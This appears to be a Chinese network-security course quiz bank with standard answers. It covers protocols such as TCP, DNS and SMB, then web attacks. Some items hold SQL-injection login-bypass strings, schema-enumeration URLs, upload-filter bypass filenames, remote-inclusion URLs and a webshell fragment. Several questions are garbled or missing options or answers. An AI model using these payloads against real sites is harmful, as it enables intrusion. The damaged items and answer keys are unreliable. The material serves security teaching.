C、 数据链路层
D、 传输层
您的答案: 标准答案: B
48、Mac地址位于IOS七层模型的哪一层()
A、 会话层
B、 网络层
C、 数据链路层
D、 传输层
您的答案: 标准答案: C
49、ARP协议的作用是()
A、 将端口号映射到IP地址
B、 连接IP层和TCP层
C、 广播IP地址
D、 将IP地址映射到第二层地址
您的答案: 标准答案: D
50、ARP协议的解析过程用了几种数据包()
A、 2
B、 3
C、 4
您的答案: 标准答案: A
1、使用哪条命令查看本地的缓存列表()
A、 arp -d
B、 arp -a
C、 arp -s
D、 arp -N
您的答案: 标准答案: B
2、免费ARP报文携带的发送端地址和目标地址都是本机IP地址
A、 对
B、 错
您的答案: 标准答案: A
3、ICMP是什么协议()
A、 动态主机设置协议
B、 Internet控制报文协议
C、 超文本传输协议
D、 超文本传输协议
您的答案: 标准答案: B
4、假设TTL的初始值为3,两台主机之间存在4个路由器,则该数据包到达目的地后的TTL的值为()
A、 1
B、 2
C、 3
D、 数据包无法到达
您的答案: 标准答案: D
5、在IP数据包里,如果一个数据流被分割成了三片,则最后一个数据包的More fragments的值为()
B、 1
C、 2
D、 4
您的答案: 标准答案: A
6、以下哪个端口可以由操作系统临时使用()
A、 143
B、 80
C、 443
D、 1433
您的答案: 标准答案: D
7、在正常的TCP握手数据包中,如果第一次握手的seq=1,则第三次握手的seq值应该是()
您的答案: 标准答案: C
8、在TCP的断开流程中,第三次会发出()标志位的TCP数据包。
A、 FIN
B、 ACK
C、 FIN/ACK
D、 WIND
您的答案: 标准答案: C
9、TCP数据包里的出现什么标志位表示连接被异常终止,或被拒绝的异常请求()
A、 FIN/ACK
B、 ACK
C、 SYN
D、 RST/ACK
您的答案: 标准答案: D
10、如果一个TCP的数据包的Len=0,则以下说法正确的是()
A、 这是一个无意义的数据包
B、 并不能说明什么
C、 网络传输出现了故障
D、 这是一个错误的数据包
您的答案: 标准答案: B
11、TCP提供有序的数据传输依靠什么序列号来排序()
A、 SEQ
B、 FIN
C、 ACK
D、 SYN
您的答案: 标准答案: A
12、第二个TCP数据包的Seq值等于第一个数据包的Seq值加上()
A、 win
B、 Len
C、 ACK
D、 SEQ
您的答案: 标准答案: B
13、在TCP数据交互里,什么决定是否有必要进行数据包重传的一个主要机制()
A、 WIND
B、 RTO
C、 LEN
D、 TTL
您的答案: 标准答案: B
14、Windows系统默认的TCP Retransmission的次数为()
A、 3
B、 4
C、 5
D、 6
您的答案: 标准答案: C
15、在TCP协议包里,如果接收方发现丢包的情况,则会发送()个重复ACK数据包
A、 3
B、 4
C、 5
D、 6
您的答案: 标准答案: A
16、在TCP协议包里,如果SACK后面的值为100-200,则说明()
A、 100之前的数据已收到
B、 100至200的数据未收到
C、 100至200的数据已收到
D、 200之后的数据已收到
您的答案: 标准答案: C
17、ICMP数据包的最大尺寸为()
A、 16K
B、 32K
C、 64K
D、 128K
您的答案: 标准答案: C
18、哪个命令用于识别一个设备到另一个设备的网络路径()
A、 ping
B、 tracert
C、 nslookup
D、 net send
您的答案: 标准答案: B
19、tracert命令进行路由跟踪时,TTL值初始为()
您的答案: 标准答案: B
20、使用tracert时,如果遇到第一个路由器,数据包就被丢弃,则()
A、 数据包不再发送
B、 重新发送相同的数据包
C、 将TTL值增1之后再发送
D、 以上无正确答案
您的答案: 标准答案: B
21、DHCP协议属于IOS哪一层协议()
A、 会话层
B、 网络层
C、 数据链路层
D、 应用层
您的答案: 标准答案: D
22、以下哪个选项不属于DHCP的工作过程()
A、 DHCP Discover
B、 DHCP offer
C、 DHCP Request
D、 DHCP Listen
您的答案: 标准答案: D
23、在DHCP协议Discover包中,客户端IP地址为()
A、 0.0.0.0
B、 255.255.255.255
C、 网关IP
D、 无法确定
您的答案: 标准答案: A
24、在Wireshark下筛选DHCP协议的数据包的关键字是()
A、 bootp
B、 udp
C、 bootparams
D、 tcp
您的答案: 标准答案: A
25、在进行DNS解析的过程中,客户计算机会首先在本地的()文件中查找主机名称所对应的IP地址
A、 svchost
B、 config.ini
C、 hosts
D、 taskmgr
您的答案: 标准答案: C
26、DNS区域传送使用什么数据包()
A、 HTTP
B、 BOOTP
C、 DHCP
D、 TCP
您的答案: 标准答案: D
27、DNS解析的两种查询方式()
A、 反向查询
B、 迭代查询
C、 循环查询
D、 递归查询
您的答案: 标准答案:
28、DNS的作用是完成域名和IP地址相互转换的工作
A、 对
B、 错
您的答案: 标准答案: A
29、DNS服务使用的端口号是()
A、 443
B、 53
C、 23
D、 25
您的答案: 标准答案: B
30、当HTTP连接成功完成后,则最后一个数据包里面的状态码为()
A、 200
B、 403
C、 404
D、 500
您的答案: 标准答案: A
31、HTTP 302状态消息表示?()
A、 所请求的页面已经转移至新的url
B、 所请求的页面已经临时转移至新的url
C、 对被请求页面的访问被禁止
D、 所请求的页面可在别的url下被找到
您的答案: 标准答案: B
32、Wireshark工具下,使用哪条命令筛选出HTTP请求包()
A、 http.request.line
B、 http.request.method
C、 http.request.version
D、 http.request.method==GET
您的答案: 标准答案: D
33、Https服务使用的端口号是()
A、 23
B、 25
C、 53
D、 443
您的答案: 标准答案: D
34、以下哪项一般不会使用SSL协议进行数据传输()
A、 QQ邮箱登录
B、 网银登录
C、 论坛登陆
D、 网上支付
您的答案: 标准答案: C
35、在SSL握手的过程中,紧接着Server Hello的过程是()
A、 Client Hello
B、 Client Key Exchange
C、 Application Data
D、 Certificate
您的答案: 标准答案: D
36、FTP进行数据传输所使用的默认端口为()
A、 20
B、 21
C、 24
D、 23
您的答案: 标准答案: A
37、FTP协议默认采用的不是明文账户密码传输
A、 对
B、 错
您的答案: 标准答案: B
38、FTP被动方式传输数据包的关键字是PASV
A、 对
B、 错
您的答案: 标准答案: A
39、在实际的网络应用中,Kerberos的认证结果是()
A、 单向
B、 双向
C、 不定向
D、 依据网络实际情况而定
您的答案: 标准答案: B
40、在Kerberos中,哪个拥有所有的密码()
A、 Client
B、 Server
C、 KDC
D、 无正确答案
您的答案: 标准答案: C
41、在Kerberos中,通过计算发送时间与接收回复时间的差值,可以对抗什么攻击()
A、 DDoS
B、 重放
C、 木马
D、 暴力破解
您的答案: 标准答案: B
42、以下哪个操作系统一般并不使用NFS协议()
A、 Windows
B、 Ubuntu
C、 RedHat
D、 Centos
您的答案: 标准答案: A
43、在NFS的写文件操作中,需要利用什么操作来确定是否存盘()
A、 GETPORT
B、 ACCESS
C、 WRITE
D、 COMMIT
您的答案: 标准答案: D
44、在NFS的写文件操作协议中,查看文件是否存在使用什么标识头()
A、 LOOKUP
B、 CREATE
C、 GETATTR
D、 COMMIT
您的答案: 标准答案: A
45、在NFS协议中,Portmap请求无回复,可能是防火墙导致
A、 对
B、 错
您的答案: 标准答案: A
46、在NFS协议中,MOUNT请求无回复,可能是共享目录访问控制权限导致
A、 对
B、 错
您的答案: 标准答案: A
47、在NTF协议中,用什么标识来确认用户()
A、 UID
B、 GID
C、 Name
您的答案: 标准答案: A
48、linux系统里可以使用CIFS协议
A、 对
B、 错
您的答案: 标准答案: B
49、以下哪个是Windows自己维护的文件共享协议()
A、 TCP
B、 NFS
C、 TCP
D、 SMB
您的答案: 标准答案: D
50、在SMB协议包中,Session Setup的任务是()
A、 身份验证
B、 身份确认
C、 会话结束
您的答案: 标准答案: A
1、SMB中的什么操作可以对访问权限进行检测()
A、 write
B、 read
C、 create
D、 trans
您的答案: 标准答案: C
2、在SMB协议中,create操作包括哪些动作()
A、 新建文件
B、 目录打开
C、 文件读写
您的答案: 标准答案:
3、CIFS协议在Windows 7中可以一次性发送多个连接请求
A、 对
B、 错
您的答案: 标准答案: A
4、以下哪个协议与电子邮件协议无关()
A、 HTTP
B、 IMAP
C、 POP
D、 SMTP
您的答案: 标准答案: A
5、邮件的附件内容是利用什么方式进行加密的()
A、 MD5
B、 RSA
C、 Base64
D、 DES
您的答案: 标准答案: C
6、SMTP协议包,文本内容以什么作为结束符()
A、 CR
B、 CR&LF
C、 LF
D、 ENTER
您的答案: 标准答案: B
7、SMTP协议使用的端口()
A、 21
B、 143
C、 24
D、 25
您的答案: 标准答案: D
8、在POP协议中,客户端向服务端发送什么命令请求邮件的内容()
A、 LIST
B、 RETR
C、 UIDL
D、 QUIT
您的答案: 标准答案: B
9、常用以双等号结尾的加密数据,一般采用Base64解密
A、 对
B、 错
您的答案: 标准答案: A
10、判断一个文件是不是PE文件,常用的方法是()
A、 查看文件扩展名
B、 查看文件开头位置是不是0xFFD8
C、 查找MZ以及PE标志
D、 没有特别有效的办法
您的答案: 标准答案: C
11、以下哪款工具主要用于文件的二进制修改()
A、 FFV
B、 WinHex
C、 Beyond Compare
D、 python
您的答案: 标准答案: B
12、NBNS协议是网络基本输入/输出系统协议
A、 对
B、 错
您的答案: 标准答案: A
13、在局域网内部使用什么协议可以方便地实现消息通信及资源的共享()
A、 NetBIOS
B、 DHCP
C、 ICMP
D、 DNS
您的答案: 标准答案: A
14、在以下什么数据包中,可以找到主机名称和所处的环境工作组()
A、 DNS
B、 DHCP
C、 ICMP
D、 NBNS
您的答案: 标准答案: D
15、Kali Linux使用什么来获取IPv6的地址()
A、 ARPv6
B、 DHCPv6
C、 ICMPv6
D、 DNSv6
您的答案: 标准答案: C
16、对比WinXP的默认启动过程,什么是Kali Linux启动过程所独有的()
A、 NBNS
B、 DHCPv6
C、 ICMPv6
D、 DNSv6
您的答案: 标准答案: C
17、IPv4地址的长度为多少位()
A、 16
B、 32
C、 64
D、 128
您的答案: 标准答案: B
18、某子网掩码为255.255.0.0,说明网络地址长度为多少位()
A、 16
B、 32
C、 64
D、 128
您的答案: 标准答案: A
19、在IP地址10.10.1.22和网络掩码255.255.0.0的情况下,下面哪个选项是正确的CIDR写法()
A、 10.10.1.22/8
B、 10.10.1.22/16
C、 10.10.1.22/24
D、 10.10.1.22/32
您的答案: 标准答案: B
20、计算机跨子网通信是需要默认网关来进行转发
A、 对
B、 错
您的答案: 标准答案: A
21、如果Wireshark当前所发送的数据包填满接收方的缓存时,就会在该TCP数据包上标记出什么字样
A、 TCP Window Full
B、 TCP Zero Window
C、 Zero Window Prob
D、 Zero Window Violation
您的答案: 标准答案: A
22、当接收方收到包含有“TCP Window Full”字样的TCP数据包以后,如果不能够及时处理缓存中的内容,那么接收方一般会回复一条带有什么字样的数据包,请求发送方暂缓发送数据()
A、 TCP Window Full
B、 TCP Zero Window
C、 Zero Window Prob
D、 Zero Window Violation
您的答案: 标准答案: B
23、发送方在发送了一个TCP数据包之后,经过RTO时间,没有收到对方的确认数据包,则应该?
A、 停止通信
B、 检测网络
C、 重传
D、 直接发送下一个数据包
您的答案: 标准答案: C
24、进行流量分析,端口镜像往往是我们首选的功能,因为它不会留下网络痕迹,也不会因此而产生额外的数据包
A、 对
B、 错
您的答案: 标准答案: A
25、以下哪项无线协议标准最不安全()
A、 WEP
B、 WPA
C、 WPA2
D、 WPA3
您的答案: 标准答案: A
26、无线网络协议遵循的是IEEE的什么标准()
A、 800.11
B、 801.1
C、 802.1
D、 802.11
您的答案: 标准答案: D
27、无线网络数据包与有线网络数据包最大的不同在于额外的802.11头部
A、 对
B、 错
您的答案: 标准答案: A
28、下面哪项是首选的嗅探器部署方法,因为它不会留下网络痕迹,也不会因此而产生额外的数据包()
A、 端口镜像
B、 ARP欺骗
C、 集线器输出
D、 使用网络分流器
您的答案: 标准答案: A
29、以下哪种wireshark部署方法,并不推荐采用()
A、 单个系统安装
B、 端口镜像
C、 集线器输出
D、 使用网络分流器
您的答案: 标准答案: A
30、不用考虑客户机临时下线的情况,我们采用哪种流量部署方法()
A、 端口镜像
B、 ARP欺骗
C、 集线器输出
D、 使用网络分流器
您的答案: 标准答案: C
31、在光纤情况下,不用考虑客户机临时下线的情况,我们采用哪种流量部署方法?
A、 端口镜像
B、 ARP欺骗
C、 集线器输出
D、 使用网络分流器
您的答案: 标准答案: D
32、进行环境测试评估,和进行性能审查,分析数据包,我们采用哪种流量部署方法()
A、 端口镜像
B、 ARP欺骗
C、 直接系统安装
D、 使用网络分流器
您的答案: 标准答案: C
33、网络分流器一般有聚合的和非聚合的网络分流器两种
A、 对
B、 错
您的答案: 标准答案: A
34、对于TCP的三次握手,以下哪项用于第一个数据包()
A、 SYN
B、 FIN
C、 RST
D、 ACK
您的答案: 标准答案: A
35、以下哪个文件保存有域名重定向信息()
A、 svchost
B、 csrss
C、 hosts
D、 spoolsv
您的答案: 标准答案: C
36、当试图访问对方未配置的的80端口时,对方数据包会回复()
A、 SYN
B、 FIN
C、 RST
D、 ARP
您的答案: 标准答案: C
37、在TCP的SYN数据包之后,应当收到什么数据包()
A、 SYN
B、 FIN
C、 RST
D、 SYN\ACK
您的答案: 标准答案: D
38、连远程服务器无响应无TCP RST这样的数据包,以下哪项不属于这种情况出现的原因()
A、 Web服务器配置错误
B、 Web服务器的协议栈崩溃
C、 防火墙数据包过滤设备
D、 Hosts配置错误
您的答案: 标准答案: D
39、DNS是基于什么协议()
A、 UDP
B、 TCP
C、 HTTP
D、 FTP
您的答案: 标准答案: A
40、DNS在如同区域传输中,使用什么协议()
A、 UDP
B、 TCP
C、 HTTP
D、 FTP
您的答案: 标准答案: B
41、关于CSRF说法正确的是
A、 删掉referer字段可以用来防止CSRF攻击
B、 CSRF攻击只能利用GET方式去达到攻击的目的
C、 登录受信任网站A,并在本地生成Cookie,在不登出A的情况下,访问危险网站B这样有可能会受到CSRF攻击
D、 XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站
您的答案: 标准答案: D
42、xss和csrf的漏洞原理是一样的
A、 对
B、 错
您的答案: 标准答案: B
43、在利用CSRF漏洞去脱裤的时候,说法错误的是
A、 CSRF是利用管理员的操作在无声无息中进行
B、 攻击者在无法预计管理员操作的过程中也是可以进行CSRF的攻击操作
C、 普通用户插入备份数据库的代码后,通过CSRF管理员触发到代码后会自动备份网站的数据库
D、 找到备份数据库的网站路径即可下载网址的.sql文件
您的答案: 标准答案: B
44、CSRF可以在无声无息中进行管理员的操作
A、 对
B、 错
您的答案: 标准答案: A
45、关于逻辑/越权漏洞说法有误的是
A、 任意用户查询,任意删属于越权漏洞,而密码找回漏洞属于逻辑漏洞
B、 一个正常的用户A通常只能够对自己的一些信息进行增删改查,但是由于程序员的一时疏忽未对信息进行增删改查的时候没有进行一个判断,判断所需要操作的信息是否属于对应的用户,可以导致用户A可以操作其他人的信息。
C、 垂直权限的访问控制缺失是逻辑/越权漏洞的根本原因
D、 密码找回漏洞是权限管理不足导致的问题
您的答案: 标准答案: D
46、挖掘密码找回逻辑漏洞黑盒Fuzz来推断程序代码是关键
A、 对
B、 错
您的答案: 标准答案: A
47、关于密码找回说法有误的是
A、 密码找回的凭证太弱,如只需要填入一个四位或者六位的纯数字就可以重置密码,导致可以暴力破解
B、 有些密码找回凭证可从客户端直接获取
C、 密码找回凭证存与单个用户绑定的可以解决密码找回漏洞
D、 修改密码过程中,验证码是可操作的话 可以直接导致密码重置
您的答案: 标准答案: C
48、有时候我们可以通过注入漏洞来控制找回密码的凭证来达到密码重置的目的
A、 对
B、 错
您的答案: 标准答案: A
49、关于越权漏洞说法有误的是
A、 1. 越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定
B、 2. 挖掘越权漏洞一般是从一些拥有敏感信息的地方(例如:收货地址/个人资料/用户订单等)进行测试
C、 3. 处理越权漏洞可以通过用户对某一数据进行增删改查时需要去校验下所操作的数据是否属于该用户
D、 4. 越权漏洞的本身对网站不会照成攻击伤害
您的答案: 标准答案: D
50、以下哪个选项对asp运算符的解释错误?()
A、 <>为不等于
B、 IS判断两个字符串是否相等
C、 XOR为"异或"运算
D、 OR为"或"运算
您的答案: 标准答案: B
1、SQL语句"select * from user where name=’". n a m e . " ′ a n d p a s s = ′ " . name."' and pass='". name."′andpass=′".pass."’"如何绕过登录?()
A、 $name设置值为admin’ and ‘1’=‘1’ $pass的值为123456
B、 $name设置值为admin’ and ‘1’='1 $pass的值为123456
C、 $name设置值为admin’ or ‘1’='1 $pass的值为123456
D、 $name设置值为admin’ or ‘1’=‘1’ $pass的值为123456
您的答案: 标准答案: C
2、以下哪个选项的内容可以替代SQL语句中的空格?()
A、 /**/
B、 #
C、 –
D、 //
您的答案: 标准答案: A
3、PHP的addslashes函数的作用是什么?()
A、 去除字符串中的预定义字符
B、 将字符串中的预定义字符之前添加反斜杠
C、 将字符串按照预定义字符进行分割
D、 将字符串中的预定义字符替换为空格
您的答案: 标准答案: B
4、mysql数据库使用utf-8字符集可能导致宽字节注入。
A、 对
B、 错
您的答案: 标准答案: B
5、%df’在以下哪种情况下能闭合单引号,形成宽字节注入?()
A、 使用PHP的trim函数,字符集使用utf-8
B、 使用PHP的trim函数,字符集使用gbk
C、 使用PHP的addslashes函数,字符集使用utf-8
D、 使用PHP的addslashes函数,字符集使用gbk
您的答案: 标准答案: D
6、以下哪种方式可以防止宽字节注入?()
A、 mysql_query(“set names gbk”)和addslashes()函数结合使用
B、 使用mysql_query(“set names gbk”)设置字符集
C、 mysql_set_charset(“gbk”)和mysql_real_escape_string()函数结合使用
D、 使用mysql_set_charset(“gbk”)设置字符集
您的答案: 标准答案: C
7、下列 ASP 接受参数的方式错误的是()
A、 request
B、 request.get
C、 request.cookie
D、 request.form
您的答案: 标准答案: B
8、下列链接中不存在注入点的是()
A、 http://www.****.com/***.asp?id=XX
B、 http://www.****.com/***.php?name=XX&page=99
C、 http://www.****.com/index/new/php-8.html
D、 http://www.****.com/news.html
您的答案: 标准答案: D
9、下列 mysql 的 PHP 函数说法错误的是()
A、 mysql_connect(‘host’, ‘username’, ‘pass’); 连接 mysql 链接
B、 mysql_db_select($database, $conn); 选择数据库
C、 mysql_query($sql, $conn); 执行 SQL 语句
D、 mysql_fetch_array($result); 将查询结果的一条返回到一个数组中
您的答案: 标准答案: B
10、下面说法是否正确,注射式攻击的根源在于,程序命令和用户数据(即用户输入)之间没有做到泾渭分明()
A、 对
B、 错
您的答案: 标准答案: A
11、程序使用 SQLServer 数据库,当程序登录页面存在注入时,下列选项中,属于万能密码的是()
A、 用户名输入: '(或") AND 1 = 1-- ;密码随便输入
B、 用户名输入: '(或") && 1 = 1-- ;密码随便输入
C、 用户名输入: '(或") OR 1 = 1-- ;密码随便输入
D、 用户名输入: '(或") || 1 = 1-- ;密码随便输入
您的答案: 标准答案: C
12、已知 SQL 语句为: s q l = ′ S E L E C T ∗ F R O M ‘ m e m b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `member` WHERE `username` = "'. sql=′SELECT∗FROM‘member‘WHERE‘username‘="′._GET[‘name’].’" AND password
= “’.$_GET[‘pwd’].’”’; ,当访问 http://xxx.com?name=admin" OR “1”=“2&pwd=” OR “1”="1 时,可以完成用户验证吗()
A、 对
B、 错
您的答案: 标准答案: A
13、已知字符型注入语句 s q l = ′ S E L E C T ∗ F R O M ‘ m e m e b e r ‘ W H E R E ‘ u s e r n a m e ‘ = " ′ . sql = 'SELECT * FROM `memeber` WHERE `username` = "'. sql=′SELECT∗FROM‘memeber‘WHERE‘username‘="′.user.’" AND pass
= “’.$pass.’”’,下列能成功执行注入的是()
A、 $user = ‘admin OR 1 = 1–’; $pass = ‘something’;
B、 $user = ‘admin OR 1 = 2’; $pass = ‘" OR 1 = 1’;
C、 $user = ‘admin" OR 1 = 1’; $pass = ‘" OR 1 = 2’;
D、 $user = ‘admin" OR “1” = "2’; $pass = ‘" OR “1” = "1’;
您的答案: 标准答案: D
14、MySQL 5 中新增了一个 information_schema 库,该库中存储了数据库信息内容,可直接爆库、爆表、爆字段;而 MySQL 4 只能采用类似 Access 的方法进行查询猜解,该说法是否正确()
A、 对
B、 错
您的答案: 标准答案: A
15、用 ORDER BY 来判断字段数量时,ORDER BY 后面跟 5 时,正常返回,后面跟 6 时,报 Unknown column ‘6’ in ‘order clause’ 错误,当前目标表有几个字段()
A、 4
B、 5
C、 6
D、 7
您的答案: 标准答案: B
16、使用 ORDER BY 手工注入进行字段数判断时,ORDER BY 6 未报错,ORDER BY 7 报 UNKNOWN COLUMN ‘7’ IN ‘ORDER CLAUSE’,该表有几个字段()
A、 5
B、 6
C、 7
D、 8
您的答案: 标准答案: B
17、已知 MySQL 版本大于 5,手工注入时,访问 http://127.0.0.1/index.php?id=3’%20SELECT%20GROUP_CAT(SCHEMA_NAME)%20FROM%20INFROMATION_SCHEMA.SCHEMATA,可以获取到的是()
A、 所有数据库
B、 所有表
C、 所有字段
D、 所有字段类型
您的答案: 标准答案: A
18、在 MySQL INFORMATION_SCHEMA 数据库中,保存数据库信息的表是()
A、 TABLES
B、 SCHEMATA
C、 COLUMNS
D、 DATABASES
您的答案: 标准答案: B
19、SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE() LIMIT 0,1 ,该语句查询的是当前数据库的第一条表信息,该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
20、下列 MySQL 的 SQL 语句中,能同时查询用户、数据库版本、数据库并以 , 分割的是()
A、 SELECT user(),version(),database();
B、 SELECT user(),’,’,version(),’,’,database();
C、 SELECT user().version().database();
D、 SELECT group_concat(user(),version(),database());
您的答案: 标准答案: D
21、下列 MySQL 的 SQL 语句中,能够查询所有数据库的是()
A、 SELECT TABLE_NAME FROM INFROMATION_SCHEMA.TABLES;
B、 SELECT SCHEMA_NAME FROM INFROMATION_SCHEMA.SCHEMATA;
C、 SELECT DATABASE_NAME FROM INFROMATION_SCHEMA.DATABASES;
D、 SELECT COLUMN_NAME FROM INFROMATION_SCHEMA.COLUMNS;
您的答案: 标准答案: B
22、下面上传突破说法错误的是()
A、 客户端 JavaScript 可以通过 Burp 抓包修改进行上传
B、 服务端 MIME 类型检测可以通过修改 Content-Type 进行上传
C、 服务端文件扩展名检测可以通过服务端解析漏洞,上传其他扩展名文件进行突破
D、 使用 a.asp;.jpg 对 IIS 8.0 服务器进行上传突破
您的答案: 标准答案: D
23、在非 PHP 的 WEB 安全中出现概率很大而且威力也很大的攻击主要有两种,第一种是 SQL 注入,第二种是上传攻击。该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
24、使用 Burp 抓包实验 0x00 截断时,下面做法可以完成绕过的是()
A、 直接在抓的包中修改 filename 部分,将可以上传的扩展名前面加空格拼接到文件后面
B、 直接在抓的包中修改 Content-Type
C、 在 Burp 抓的包中选择 Hex(十六进制),修改符合条件的后缀名前面点的十六进制为 00
您的答案: 标准答案: C
25、服务器检测绕过(目录路径检测),因为对目录路径的检测不够严谨而导致可以使用 0x00 截断攻击,该说法是否正确()
A、 对
B、 错
您的答案: 标准答案: A
26、在 fckeditor 2.4.3 或之前版本的黑名单中 ConfigDeniedExtensions.Add “File”, “html|htm|php|php2|php3|php4”,下列方法中可以绕过上传 php 文件的是()
A、 上传文件 shell.PhP
B、 上传文件 shell.php4
C、 上传文件 shell.php3
D、 上传文件 shell.php .jpg
您的答案: 标准答案: A
27、已知服务器为 Apache,且后缀名 123abc 未在黑名单中、后缀名 asp 在黑名单中,上传 shell.asp.123abc 文件能否成功执行()
A、 对
B、 错
您的答案: 标准答案: A
28、利用 IIS 解析漏洞,含有一句话木马的文件 test.php;.jpg,可以被菜刀连接成功吗()
A、 对
B、 错
您的答案: 标准答案: A
29、下列即属于黑名单检测绕过又属于白名单检测绕过的是()
A、 文件名大小写绕过
B、 名单列表绕过
C、 特殊文件名绕过(windows)
D、 0x00 截断绕过
您的答案: 标准答案: D
30、一个文件名为 x1.x2.x3 的文件,Apache 会从 x3 的位置往 x1 的位置开始尝试解析,一直往前解析,直到遇到一个能解析的扩展名为止,该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: A
31、当 PHP 配置设置为可以远程包含时,下列是远程包含的是()
A、 http://www.mubiao.com/file.php?read=../../../image/shell.php
B、 http://www.mubiao.com/file.php?read=/image/shell.php
C、 http://www.mubiao.com/file.php?read=C:/htdocs/image/shell.php
D、 http://www.mubiao.com/file.php?read=http://www.xxx.com/shell.php
您的答案: 标准答案: D
32、当 PHP 配置文件中, allow_url_include 设置为 off 时,可以包含远程文件,该说法正确吗()
A、 对
B、 错
您的答案: 标准答案: B
33、Web目录下的upload/test.zip文件通过以下哪种链接可以下载?()
A、 upload/…/test.zip
B、 upload/…/./test.zip
C、 config/…/upload/test.zip
D、 config/././upload/test.zip
您的答案: 标准答案: C
34、Windows平台下的Web目录下的test.php不能通过test.PhP访问。
A、 对
B、 错
您的答案: 标准答案: B
35、PHP执行函数strrpos(“I_love_php.php”,".php")会返回什么值?()
A、 7
B、 8
C、 9
D、 10
您的答案: 标准答案: D
36、PHP执行函数strtolower(“PHP”)会返回什么值?()
A、 php
B、 Php
C、 PHp
D、 PHP
您的答案: 标准答案: A
37、关于安全狗检测cookie注入的功能,下列哪些说法正确?
A、 点击主动防御菜单中,Sql注入规则,选择cookie,点击确定
B、 无需配置,安全狗默认开启
C、 点击资源保护,选择cookie注入检测
您的答案: 标准答案: A
38、如果网站id参数过滤了and和号,就无法进行手工判断是否有注入点。
A、 对
B、 错
您的答案: 标准答案: B
39、在Sqlmap的tamper插件中,可以将空格转移成其他字符的是哪个脚本?
A、 space2mysqlblank
B、 apostrophemask
C、 equaltolike
您的答案: 标准答案: A
40、Sqlmap使用哪个参数可以直接对网站进行注入判断?
A、 --data
B、 --dbs
C、 =-u
您的答案: 标准答案: C
41、如何判断网站是否存在注入点?
A、 在网站参数后输入中文字符
B、 在网站参数后输入and 1=1、and 1=2
C、 在网站参数后输入 or 1=1
您的答案: 标准答案: B
42、Sqlmap中,下列哪个参数,可以获取当前数据库所在名称?
A、 --current-db
B、 --data
C、 --tables
您的答案: 标准答案: A
43、以下选项中,那一项是正确的PHP一句话木马?
A、
B、
C、 <%execute(request(“value”))%>
D、 <%eval(Request.Item[“value”])%>
您的答案: 标准答案: B
44、用户在上传图片时,快速返回错误提示则说明是本地的上传类型验证。
A、 对
B、 错
您的答案: 标准答案: A
45、当页面返回“File Type Error”时,则说明你上传的文件类型不正确,网站对文件类型进行了相关验证。
A、 对
B、 错
您的答案: 标准答案: A
46、针对文件扩展名检测,哪些扩展名可以绕过该限制?
A、 php2和php3
B、 php4和php3
C、 php5和php3
D、 php5和php2
您的答案: 标准答案: B
47、针对文件内容检测,如何进行绕过而上传?
A、 修改图片的类型
B、 使用burp抓包并插入一句话木马
C、 使用burp抓包并插入一句话木马,修改文件后缀
D、 使用burp抓包并修改文件后缀
您的答案: 标准答案: C
48、空字节截断目录路径检测绕过是将文件后缀替换空格就会成功上传
A、 对
B、 错
您的答案: 标准答案: B
49、在本节视频中,IIS6.0站上的解析缺陷绕过,上传后保存的路径正确的是?
A、 在1.php目录下
B、 1.php:1412790008.jpg
C、 upload/1.php
D、 upload/1412790008.jpg
您的答案: 标准答案: B
50、Apache服务中的解析缺陷,可以导致绕过上传的文件格式是什么?
A、 7z
B、 asp
C、 php
D、 asps
您的答案: 标准答案: A
1、htaccess文件上传解析漏洞,可以导致正确被解析的文件格式是?
A、 .png
B、 .bmp
C、 .img
D、 .jpg
您的答案: 标准答案: D
2、FCK编辑器的查看版本的URL路径是?
A、 _whatsnew.htmls
B、 _whatsnew.html
C、 _samples/default.html
D、 _samples/default.html/fck.html
您的答案: 标准答案: B
3、使用FCK编辑器解析漏洞进行上传,以下说法正确的是?
A、 直接利用新建文件夹1.asp
B、 新建文件夹1.asp,在1.asp目录下新建2.asp
C、 利用新建文件夹1.asp,再修改文件内容上传
D、 修改文件内容上传
您的答案: 标准答案: B
4、在IIS管理器里设置IP地址和域名限制拒绝列表不可以限制页面的访问
A、 对
B、 错
您的答案: 标准答案: B
5、.htaccess设置列表allow参数的意思是?
A、 禁止显示目录列表
B、 封禁一个IP地址
C、 允许特定的IP地址
D、 重定向
您的答案: 标准答案: C
6、下列选项对于谷歌语法中的site用法解释正确的是?
A、 把搜索范围规定在特定的站点中
B、 搜素范围限定在标题中
C、 网址中url的一些信息
D、 网页的链接中包含所有查询关键字
您的答案: 标准答案: A
7、服务端未对传入的跳转URL参数进行检测和控制而导致的URL调整漏洞
A、 对
B、 错
您的答案: 标准答案: A
8、XSS漏洞产生的原因是什么?
A、 对用户的输入过滤不足
B、 浏览器植入恶意软件
C、 Post请求被劫持
D、 WebKit安全机制不严谨
您的答案: 标准答案: A
9、利用存储型XSS漏洞可以进行XSS蠕虫攻击。
A、 对
B、 错
您的答案: 标准答案: A
10、当XSS代码被嵌入到标签中时,应该使用何种方式继续尝试进行攻击?
A、 修改浏览器进行尝试
B、 闭合标签后提交代码
C、 更换页面继续进行尝试
D、 闭合
您的答案: 标准答案: B
11、在浏览器支持JavaScript伪协议的情况下,可以使用HTML的属性值执行XSS代码
A、 对
B、 错
您的答案: 标准答案: A
12、在IE5及以后,CSS样式中使用Expression同样可以触发XSS漏洞
A、 对
B、 错
您的答案: 标准答案: A
13、采用黑名单过滤方式,用户可以结合使用注释字符感染和欺骗过滤器
A、 对
B、 错
您的答案: 标准答案: A
14、css_soup = BeautifulSoup(’
’);css_soup.p[‘class’] 这句输出的是字符串"body"吗A、 对
B、 错
您的答案: 标准答案: B
15、Tag.clear() 方法是用来移除当前Tag的吗?
A、 对
B、 错
您的答案: 标准答案: B
16、code, head, html, redirect_url, log = hh.http(url)中log的数据类型是什么?
A、 字符串
B、 数字
C、 字典
D、 链表
您的答案: 标准答案: C
17、hackhttp可以用来上传文件这个说法正确吗
A、 对
B、 错
您的答案: 标准答案: A
18、hackhttp是通过以下代码来自定义cookie的吗 hackhttp.hackhttp(cookie=“a=b;”) ?
A、 对
B、 错
您的答案: 标准答案: B
19、BeautifulSoup 对象的.contents 属性可以将tag的子节点以数据类型的方式输出,是什么数据类型?
A、 字符串
B、 数字
C、 字典
D、 列表
